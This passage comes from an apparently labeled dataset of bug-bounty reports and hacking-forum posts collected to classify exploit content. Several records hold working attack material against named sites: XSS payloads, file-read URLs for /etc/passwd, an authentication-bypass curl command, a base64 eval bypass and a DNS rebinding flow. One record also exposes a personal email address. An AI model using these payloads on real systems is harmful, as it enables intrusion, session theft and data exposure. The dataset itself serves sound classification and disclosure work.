hackerone.com\n\n[sinp]\n\n{\"operationName\":\"SaveCollaboratorsMutation\",\"variables\":{\"input\":{\"report_id\":2032701,\"collaborators\":[{\"username_or_email\":\"testmealways\",\"bounty_weight\":0.9989999999999999},{\"username_or_email\":\"███████\",\"bounty_weight\":0.9989999999999999},{\"username_or_email\":\"███████\",\"bounty_weight\":0.9989999999999999}]},\"product_area\":\"collaboration\",\"product_feature\":\"save_collaborators\"},\"query\":\"mutation SaveCollaboratorsMutation($input: SaveCollaboratorsMutationInput!) {\\n saveCollaborators(input: $input) {\\n was_successful\\n errors {\\n edges {\\n node {\\n message\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n\n````\n\nExample :\n\nHere is email for todayisnew , Hacker 1 rank in H1 :\n\n```\n████████\n\n```\n\n\nVideo PoC :\n\n████████\n\n## Impact\n\nAn attacker can view any user's email registered with Hackerone as hacker .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "474e65d2addad172af2c", "text": "[Unknown] [Java] CWE-089: MyBatis Mapper XML SQL Injection\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1551f408dae1bbadece0", "text": "I pulled out all my hair during this exercise. WIthout the specific hint to look for the string johneverist: ‘malicious request’ within the >1000 lines HTTP-response, I would have never figured out any reaction to command injection attemps. I can give one more recommendation: Look for different ways to start a sub-shell, as neither && not || worked for me!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2ccb87949751e455dc01", "text": "Yes, I am also stuck at flag4. I pivoted to user Barry, who is adm group member. Found nothing in the logs. To read flag4, tomcat user privileges are required. I have no idea where to go from here. Pivot to tomcat service role?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3b5aba22e0f63934a42b", "text": "I think this box might spawn with slightly different parameters for each person Because || and | always came back as malicious for me, and in Naivenom ’s screenshot, it looks like the command is being executed with sh whereas for me it was using bash. Also I never got anywhere with <<<. I did end up using ${LS_COLORS} and ${PATH}. I think it might be based on IP, as the rules always seemed to stay the same even when I reset the box. Could probably test this with a VPN but I don’t feel like it. If you’ve scrolled down this far you’re probably pretty stuck, here’s what I have to add: johneverist ’s tips are very good. Use them. Number one thing, don’t get stuck thinking you have to use anyone’s exact syntax. As I said, I think this might change person to person. Find the injection point, you’ll know you’re getting close when you get ‘malicious request detected’, but only for certain inputs. There is another spot on the site where this will be returned every time. Do not be fooled. Methodically go through and figure out what syntax is allowed for you, write it down, make a list. Write down exactly what error you get for each string you send through, there could be clues there. Try to get ‘ls’ working, so you can find where the flag.txt is I’d recommend actually using the buttons on the site and just intercepting them with Burp/ZAP, rather than using repeater, so you can actually see the results on the site. It’s slower, but I think I would have missed some things if I was just using repeater. One thing I haven’t seen people mention here is `` these things. They’re pretty cool. Just sayin.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e1fe5c15a522ff621778", "text": "I messed up by having burp running and not the whole website loaded. Remember to disable burp when you visit the website for the first time", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a24d40a17e31d499064", "text": "[Unknown] [Python] Unsafe Unpacking and TarSlip bug slaying\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "21aa264e1ff839848e6e", "text": "[Cross-site Scripting (XSS) - Reflected] RXSS on https://equifax.gr8people.com on Password Reset page in the username parameter\n\nHello,\n\nWhile testing your program i came across a website that is owned by informatica and is vulnerable to RXSS on Password Reset page in the username parameter\n\nPOC:\nhttps://equifax.gr8people.com/index.gp?method=cappportal.showPortalValidateChangePasswordCode&username=%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\n\nPayload:'\">\n\nworks both on firefox and chrome.\n\nfirefox.png and chrome.png\n\nNote that we can observe that the domain belongs to informatica by the footer of the page \"© 2019 Equifax, Inc. All rights reserved.\"\n\nregards\nmiguel santareno\n\n## Impact\n\nAttackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f1695af4993cd918b518", "text": "@james.clare Look at your --dnsserver argument and think about what it’s doing. Is that the IP you should be querying? Google that IP address and learn about what it is. Then think about where your queries should be going.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-03-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2ad6a0e6414a4ac5eb38", "text": "[Unknown] CPP: Add query for CWE-369: Divide By Zero.\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ce1987c117e875a87e1a", "text": "[Improper Authentication - Generic] Account takeover leading to PII chained with stored XSS\n\n## \nI have found a vulnerability on https://vehiclestdb.fas.gsa.gov/ for account takeovers\nThe website is not using proper authentication to claim the user signing in is actually the account owner due to only requiring an email address to sign in and no password. This leads to an attacker being able to place a stored XSS payload within the victims profile and reveals PII including phone numbers of the victim. \n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Visit https://vehiclestdb.fas.gsa.gov/\n 2. Enter email address in the signing form itsdavenn@gmail.com (or for official account use tesg@gsa.gov)\n 3. You have now signed in as a users account you do not own and if you browse to the profile you can see PII in the form of phone numbers.\n4. We can do this with any registered user\n5. You can place an XSS stored payload on the users profile in the first name field using ant\" autofocus onfocus=prompt(1) x=\" \n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\nPlease re create these steps to see the impact\n\n## Impact\n\nAn attacker can takeover any users account from just knowing the email address, from here on in they can find PII in the form of phone numbers and place stored XSS on the users profile to execute JavaScript code on the users profile.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7fb703881386dba977c5", "text": "Hello. I use an ALFA AWUS036NHA for wireless adapter and it works flawlessly and doesn’t cost a fortune. I’d highly recommend it for someone starting up where you may not want to throw a lot of cash into the equipment. Example link (Amazon) .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "de3fa82147bdd939d11a", "text": "never mind, I’ve found it. I think I mistyped on my first attempt", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "93d20f1de0a594425ccd", "text": "did you try to grep the output of the error.log file ??", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3759f7beb8b5d0408435", "text": "[Improper Access Control - Generic] DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)\n\n**Summary:** This is an insufficient fix of CVE-2022-32212, which itself is a fix of CVE-2018-7160. There exists a specific behaviour in browsers on macOS devices when handling the `http://0.0.0.0`URL that allows an attacker-controlled DNS server to bypass the DNS rebinding protection by resolving hosts in the `.local` domain.\n\n**Description:** \n\nIn the latest version, only IP addresses and `localhost` are allowed in the `Host` header when connecting to the debugger endpoint. `IsIPAddress` ensures that IPv4 address octets only contain values ranging from 0 to 255, but this allows `0.0.0.0` [which indicates an invalid or unroutable target](https://en.wikipedia.org/wiki/0.0.0.0). \n\nIn macOS devices, using `fetch(\"http://0.0.0.0\")`or opening `http://0.0.0.0` through a top-level navigation in Chrome and Firefox will cause a DNS request to resolve `.local`, where Computer Name is configured in the system preferences (the use of the `.local` TLD is a known [feature](https://blog.scottlowe.org/2006/01/04/mac-os-x-and-local-domains) of macOS devices). If such a request succeeds, `http://0.0.0.0` is routed to the IP address provided in the DNS reply. This would typically be the same as the IP address of the device on the local network, so `http://0.0.0.0` will typically route to any application listening on the local interface - working as intended.\n\nAn attacker-controlled DNS server can, however, resolve `.local` to any arbitrary IP address, and consequently cause the victim's browser to load arbitrary content at `http://0.0.0.0`. This allows the attacker to bypass the DNS rebinding protection.\n\nNote: On Windows devices, `http://0.0.0.0` is treated as an invalid URL and the request is blocked.\n\n## Steps To Reproduce:\n\n### General Attack Flow\n\n1. Victim runs node with --inspect option\n2. Victim visits attacker's webpage\n3. The attacker's webpage opens `http://0.0.0.0:9229`\n4. Victim asks the DNS server for `.local` and gets .\n5. Victim loads webpage `http://0.0.0.0:9229` from .\n6. The webpage `http://0.0.0.0:9229` tries to load `http://0.0.0.0:9229/json`.\n7. Due to a short TTL, the DNS server will be soon asked again about an entry for `.local`. This time, the DNS server responds with \"127.0.0.1\".\n8. The `http://0.0.0.0:9229` website (i.e., the one hosted on ) will retrieve `http://0.0.0.0:9229/json` from 127.0.0.1, including webSocketDebuggerUrl.\n9. Now, the attacker knows the webSocketDebuggerUrl and can connect to it using WebSocket. Note that WebSocket is not restricted by same-origin policy. By doing so, they can gain the privileges of the Node.js instance.\n\nVulnerable code segment: https://github.com/nodejs/node/blob/d9b71f4c241fa31cc2a48331a4fc28c15937875a/src/inspector_socket.cc#L164-L183\n\n### DNS Setup\n\nIn this example I used [dnsmasq](https://thekelleys.org.uk/dnsmasq/doc.html) as my DNS server. You can use {F1816108} for a minimal Docker setup that demonstrates the arbitrary resolution of `.local` domains. The `hosts` file should be changed according to the configured Computer Name of the victim device (through system preferences). For example, my Computer Name is `Zeyu’s MacBook Pro`, which means I had the `Zeyus-Macbook-Pro.local` domain.\n\n```\n# Resolve .local to any IP address\n1.1.1.1 Zeyus-Macbook-Pro.local\n```\n\nWhen connecting to `http://0.0.0.0`, the page is loaded from `1.1.1.1` instead.\n\n{F1816116}\n\nIf you observe the network traffic while connecting to `http://0.0.0.0`, you should see the relevant DNS requests and replies.\n\n{F1816134}\n\nSubsequently `.local` can be rebinded to `127.0.0.1`, causing the page to be loaded from `127.0.0.1` where the debugger is listening.\n\n{F1816125}\n\n## Suggested Remediation\n\n[According to IANA](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml), `0.0.0.0/8` is a reser", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32212", "CVE-2018-7160"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9af4f93fb7b38ad9de1b", "text": "Yes, I used the blur spoiler markup for those not interested in the direct answer (though I assumed it could be unmasked if clicked on). Yes, I also used a different class other than BIOS as well. Glad you got it figured out!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "870febf335adaa947dd3", "text": "[Cross-site Scripting (XSS) - Generic] XSS via Client Side Template Injection on www.███/News/Speeches\n\nDear DoD - Team,\nI am able to execute javascript code on www.███████/News/Speeches.\n\nThis endpoint has a search functionality with the parameter `Search`. The supplied value to this parameter gets embedded into the website.\nFurthermore the frontend of the website is presumably created with a template engine. These engines handle user supplied data within double curly braces `{{...}}` for example. If the user input is not sanitized corretly template injection can occur.\n\nWhen supplying the `Search` parameter with a value inside double curly braces it gets evaluated and the result is then embedded into the web page.\n\nFor example the search value `www.███████/News/Speeches?Search={{7*7}}` gets evaluated to `49` and put into the web page (see image_1.png).\nBesides simple mathematical equations, javascript code can be put inside those braces too (see image_2.png). This will execute the code as well which results in a XSS vulnerability.\n\nThere are some mitigations to this. For example some methods are blacklisted which means alert(1) is not allowed. However this can be bypassed by encoding the payload into a base64 string and call a decode method before evaluating (executing) the code.\n\nI've come up with a simple payload which triggers all javascript code thus bypassing the blacklisting of potential dangerous methods.\n\n`https://www.████/News/Speeches/?Search={{window['eval'](window['atob'](window['decodeURIComponent']('BASE_64_ENCODED_PAYLOAD')))}}`\n\nA poc video is attached.\n\n## Recap\n\nA client side template injection vulnerability is present through the `Search` parameter. This leads to the ability to run arbitrary javascript code on the client side.\n\n## Impact\n\n- run arbitrary javascript code on the victims machine\n- Since the javascript code is run within the realm of ██████ CORS bypass on other endpoints could be possible.\n- Forgery of information\n\n## System Host(s)\nwww.█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n- Copy the provided link in the description section\n- Replace the `BASE_64_ENCODED_PAYLOAD` with an actual base64 encoded javascript code. For Example `YWxlcnQoMSk=` which is `alert(1)` in base64.\n - Insert the crafted url into the browser.\n- done\n\n## Suggested Mitigation/Remediation Actions\nSanitize the user input so double curly braces `{{...}}` won't trigger a client side server injection", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31cdeeb0a182262ec15c", "text": "[Path Traversal] Apache Airflow path traversal by authenticated user\n\nApache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to perform unauthorized file access outside the intended directory structure by manipulating the run_id parameter.\n\n## Impact\n\nDenial of Service (DoS): By traversing to system directories and attempting to access large or resource-intensive files, an attacker can cause a denial of service condition. This can lead to system crashes, resource exhaustion, or degraded performance.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ea28a137dcf2b4cfd18f", "text": "[Improper Access Control - Generic] Sub-Domain Takeover at http://www.codefi.consensys.net/\n\nSummary:\n \nSubdomain takeovers:\n\nA subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn't been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it.\n\nIf an attacker can do this, they can potentially read cookies set from the main domain, perform cross-site scripting, or circumvent content security policies, thereby enabling them to capture protected information (including logins) or send malicious content to unsuspecting users.\n\n Steps To Reproduce:\n\n 1. GO to http://consensys.net and find its sub-domains using Subfinder.\n 1. now find sub-domains status code.\n 1. Search for 404 code.\n 4. its showing :- \nDomain Not Claimed\nThis domain has been mapped to Squarespace, but it has not yet been claimed by a website. If this is your domain, claim it in the Domains tab of your Website Manager.\n5. now create a account at Squarespace, create a website template and then go to use a domain i own.\n 6. then copy and paste http://www.codefi.consensys.net/ and boom sub-domain takeover completed.\n\nSupporting Material/References:\n\nPOC is attached below.\n\n\n How to prevent it ?\n\nPreventing subdomain takeovers is a matter of order of operations in lifecycle management for virtual hosts and DNS. Depending on the size of the organization, this may require communication and coordination across multiple departments, which can only increase the likelihood for a vulnerable misconfiguration.\n\nDefine standard processes for provisioning and deprovisioning hosts. Do all steps as closely together as possible.\nStart provisioning by claiming the virtual host; create DNS records last.\nStart deprovisioning by removing DNS records first.\nCreate an inventory of all of your organization's domains and their hosting providers, and update it as things change, to ensure that nothing is left dangling.\n\n## Impact\n\nRisks of a Subdomain Takeover:-\n\nVarious risks could be the result of a subdomain takeover.\n\n1. Bypassing CSRF protection\n2. Phishing\n3. Leak of OAuth 2.0 Tokens\n4. The redirect is only performed if the target URL is trusted. If all subdomains are trusted as target URL, an attacker might be able to get OAuth 2.0 tokens via a target URL which points to a compromised subdomain.\n5. Bypass Content Security Policy\n6. A, AAAA and CNAME Records", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "135ae5024b5afa6b530b", "text": "[PHP Local File Inclusion] Local File Read vulnerability on ██████████ [HtUS]\n\nKindly check screenshot ███████: In case if scope question. Because i picked this site from DOD website list under 'dod sites'. Lets move on to the bug now :)\n\n## Summary:\nLocal File Include vulnerability on ███. Oracle Ebs Bispgrapgh is prone to a directory traversal vulnerability that can be exploited by remote attackers to access sensitive data on the server.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. to view /etc/passwd file visit https://██████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/\n 2. to view /etc/motd file visit https://██████████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=motd&ifl=/etc/\n 3. to view /etc/profile visit https://██████/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=profile&ifl=/etc/\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n* █████:\n* █████:\n* https://web.cystack.net/vulnerability/cystack.remote.oracle_ebs_bispgrapgh_file_read\n\n## Impact\n\nAn attacker could read local files on the web server that they would normally not have access to, such as the application source code or configuration files containing sensitive information on how the website is configured.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3317ca1c65024bf1f1fb", "text": "[Improper Authentication - Generic] Attacker can bypass authentication build on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)\n\nReport Submission Form\n\n## Summary:\nSending request with `..%2F` allows to manipulate headers:\n\n* X-Original-Url\n* X-Auth-Request-Redirect\n\ndue to that manipulation external auth service could make wrong decision and return 204 instead of 401/403. **To be clear: manipulation of those headers give no possibility to kubernetes user to make any proper decisions based on those headers. ** This way allowing anonymous access to public service and trying to protect access to protected-service by e.g. api-key is not possible.\n\n{F1469913}\n\nExample:\nWith this call `curl -v http://app.test/public-service/..%2Fprotected-service/protected` external auth configured on ingress using `nginx.ingress.kubernetes.io/auth-url: http://auth-service.default.svc.cluster.local:8080/verify` will get following headers:\n```\nX-Request-Id: 7d979c82ca55141ed0d58655fbaac586\nHost: auth-service.default.svc.cluster.local\nX-Original-Url: http://app.test/public-service/..%2Fprotected-service/protected\nX-Original-Method: GET\nX-Sent-From: nginx-ingress-controller\nX-Real-Ip: 192.168.99.1\nX-Forwarded-For: 192.168.99.1\nX-Auth-Request-Redirect: /public-service/..%2Fprotected-service/protected\nConnection: close\nUser-Agent: curl/7.75.0\nAccept: */*\n```\nBoth headers `X-Original-Url` and `X-Auth-Request-Redirect` are manipulated. \n\nHow this auth-service can parse request? Here is simple example of python and Flask:\n```\napi_key = request.headers.get('X-Api-Key')\nrequest_redirect = request.headers.get('X-Auth-Request-Redirect')\n\nif request_redirect and request_redirect.startswith(\"/public-service/\"):\n return Response(status = HTTPStatus.NO_CONTENT)\n\nif api_key == \"secret-api-key\": \n return Response(status = HTTPStatus.NO_CONTENT)\n\nreturn Response(status = HTTPStatus.UNAUTHORIZED)\n```\n\n## Kubernetes Version:\nminikube v1.23.2 on Microsoft Windows 10 Pro 10.0.19043 Build 19043\nKubernetesa v1.22.2 on Docker 20.10.8\n\n## Component Version:\nk8s.gcr.io/ingress-nginx/controller:v1.0.0-beta.3@sha256:44a7a06b71187a4529b0a9edee5cc22bdf71b414470eff696c3869ea8d90a695\n\n## Steps To Reproduce:\n\n 1. Download project in attachment: F1469916\n 2. Install minikube\n 3. Enable addon ingress and ingress-dns\n 4. Build docker images:\n\n * `cd auth-service; docker build -t auth-service:0.0.4 .`\n * `cd protected-service; docker build -t protected-service:0.0.1 .`\n * `cd public-service; docker build -t public-service:0.0.1 .`\n\n 5. push docker images into minikube:\n\n * `minikube image load auth-service:0.0.4`\n * `minikube image load protected-service:0.0.1`\n * `minikube image load public-service:0.0.1`\n\n 6. apply kubernetes configuration: `kubectl apply -f app.yaml`\n\nTo access public service: `curl -v http://app.test/public-service/public`\nTo access protected service: `curl -v http://app.test/protected-service/protected -H \"X-Api-Key: secret-api-key\"`\nTo access protected service bypassing authentication: `curl -v http://app.test/public-service/..%2Fprotected-service/protected`\n\n## Supporting Material/References:\n\n * in F1469916 - project consist of 2 services: public and protected. Access to public should be available for anyone and to protected only with `X-Api-Key` header. auth-service is protecting access and configured as external auth on ingress.\n * app.yaml - whole configuration\n * auth-service, protected-service, public-service - directories with Dockerfiles to build\n\n## Additional note\nAt first I have found this vulnerability in old version of ingress-nginx. It was 0.70.0. With this old version bypass was working without encoding of / to %2F.\ne.g. `curl -v http://app.test/public-service/../protected-service/protected`\nI was not able to reproduce it locally with minikube (couldn't install old ingress addon), but there is possibility that for some older versions of ingress-nginx you don't need to encode / to %2F.\n\n## Impact\n\nAttacker can bypass authentication build on ingress externa", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1cf1040ae5e4b879f032", "text": "never mind, i found it: ^ (caret) means “the beginning of the line”. So “^a” means find a line starting with an “a”.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ded722b4da40d7ce3ac6", "text": "[Security Through Obscurity] Link-shortener bypass (regression on fix for #1032610)\n\nReport #1032610, entitled\n\n> Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links\n\nwas [closed as _Resolved _ about six months ago](https://hackerone.com/reports/1032610#activity-12095285).\n\nHowever, a regression on the fix for the vulnerability in question seems to have occurred, and the bug is reproducible with the exact same payload.\n\n## Impact\n\nRefer to [#1032610](https://hackerone.com/reports/1032610#user-content-impact).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1477cd428e5bb57d89b2", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS on wordpress.com\n\n## Summary:\nHello team,\nI found a Stored XSS vulnerability in WordPress.com via app.crowdsignal.com. It is similar to report #1987172.\n\n## Platform(s) Affected:\nwordpress.com\n\n1 .Go to https://app.crowdsignal.com/dashboard and create a poll.\n2. Enter the following payload as an answer: \"style=\"position:fixed;top:0;left:0;border:999em solid green;\" onmouseover=\"alert(document.cookie)\"\n3. Go to \"Share Your Poll\" and copy the link.\n4. Navigate to https://wordpress.com/posts and add a new post.\n5. Include the copied link in the post.\n6. Save the post.\n7. Open the page and click on \"View Results.\"\n8. The XSS vulnerability will be triggered.\n\n████\n\n## Impact\n\nThe attacker can use this issue to execute malicious script code in the victim user browser also redirect the victim user to malicious sites", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b4ebb64156ec5a0ad415", "text": "[Information Exposure Through Debug Information] Able to see highest poll result without voting or view result\n\nHi Fetlife, in your last blog post https://fetlife.com/releases/2023-11-10-view-poll-results-without-voting\n\nBut it seem there is a way to see the highest vote count without even without `view result` and I was able to vote later as well. And my appology, I do have a working example, but the exact mechanism I'm not go through the end - which line of code or which request does this (I'll update in comment if I find one - pressure for the first report).\n\nThis vote: https://fetlife.com/users/17704987/s/6168250076, currently have 1 vote, you could find out which vote by doing this:\n\n1. Open Burp and proxy all http request.\n2. Click `view result` and accept.\n\n{F2848145}\n\nBecause I already intercept all request, no request actually go to fetlife server. However, I notice that, the vote number 2 light up.\n\n{F2848148}\n\nIt is infact the vote have highest count (this is the third time I test - so it is not a fluke). I will update my investigate further if I find the root core in comment (it might be in the html).\n\n## Impact\n\nI was able to see which vote have the highest vote without `view result` or even `voting`. Now I know which vote is the highest - and I have not `vote` or even `view result` yet.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87bc82aeaa7d81e3c2ac", "text": "[Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)] Html injection\n\n## Issue Description\nHypertext Markup Language (HTML) injection is a technique used to take advantage of non-validated input to modify a web page presented by a web application to its users. Attackers take advantage of the fact that the content of a web page is often related to a previous interaction with users. When applications fail to validate user data, an attacker can send HTML-fomatted text to modify site content that gets presented to other users. A specifically crafted query can lead to inclusion in the web page of attacker-controlled HTML elements which change the way the application content gets exposed to the web. \n\n## Issue Identified\nThe consultant identified that the `show` parameter can reflect into the html page, the outline below demonstrates the steps taken to exploit and reproduce.\n## Risk Breakdown\n- Risk: **Medium**\n \n- Difficulty to Exploit: **Medium**\n \n- CVSS:3.1 Score: **5.4** [(/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\n## Affected URLs\n - https://www.wikichat.fr\n\n\n## Exploit Link\n ```html\n https://www.wikichat.fr/trouver-lalimentation-adaptee-chat/?show=pedbaq%22%3E%3Ch1%3Especial%20offer%20%3Ca%20href=https://google.com%3Emalicious%20link%3C/a%3E%3C/h1%3E%3Cinput%20type=hidden%20id=%22\n ```\n\n## Steps to Reproduce\nThe following steps indicate a proof of concept outlined in three(2) steps to reproduce and execute the issue.\n\n**Step 1:**\nOpen the `Exploit Link` and you will see the `special offer` with `malicious link` as shown in the image below\n\n![alt text](https://www.uplooder.net/img/image/87/76f9c0358f1f67069b0aeb89de2e0c68/Screenshot-from-2023-07-10-16-40-30.png \"malicious page\")\n\n\n\n**Step 2:**\nWhen the user clicks on the link, redirected to the attacker's site\n\n\n## References\n - [1] [snyk](https://security.snyk.io/vuln/SNYK-JAVA-COMXUXUELI-3248764)\n - [2] [OWASP](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection)\n\n## Impact\n\nFraud and deceiving site users", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6a979010b905f2a6abe5", "text": "[Cross-site Scripting (XSS) - Stored] stored cross site scripting in https://███\n\nIt was observed that the application is vulnerable to cross-site scripting (XSS). XSS is a type of attack that involves running a malicious scripts on a victim’s browser.\npoc attached\nanother parameter at #1636345\nq_21675\n\n## Impact\n\nCookie Stealing - A malicious user can steal cookies and use them to gain access to the application.\nArbitrary requests - An attacker can use XSS to send requests that appear to be from the victim to the web server.\nMalware download - XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the\nsite, the user may be more likely to trust the request and actually install the malware.\nDefacement - attacker can deface the website usig javascript code.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nvideo\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bffe72b8999995cdb87e", "text": "[Information Disclosure] Origin IP found, Cloudflare bypassed\n\n## Summary:\nNon-Cloudflare IPs allowed to access origin servers\n## Description\nThe frontend currently resolves to 104.16.100.160, owned by Cloudflare, which act as your reverse proxy and WAF. By correlating your SSL Certificates to other hosts on the internet that serve the same content I was able to determine the current Origin Server as 3.211.245.254, operated by Amazon's AWS services.\nBy using these IP address as a resolver instead of the intended addresses I'm able to access the service without going through the WAF, thus I'm able to forward unfiltered payloads to the service, as well as avoiding the common protections offered by Cloudflare, also being able to perform crippling denial-of-services towards the origin.\n##PoC\nhttps://www.shodan.io/host/3.211.245.254\nhttp://3.211.245.254\n## Suggestions\nMy recommendations fall in line with Cloudflare's own guidelines: the Origin server must communicate exclusively with Cloudflare's IP address ranges, otherwise—as reported in this post on Cloudflare's blog, the protection offered by having a reverse proxy basically becomes useless.\n## Bug 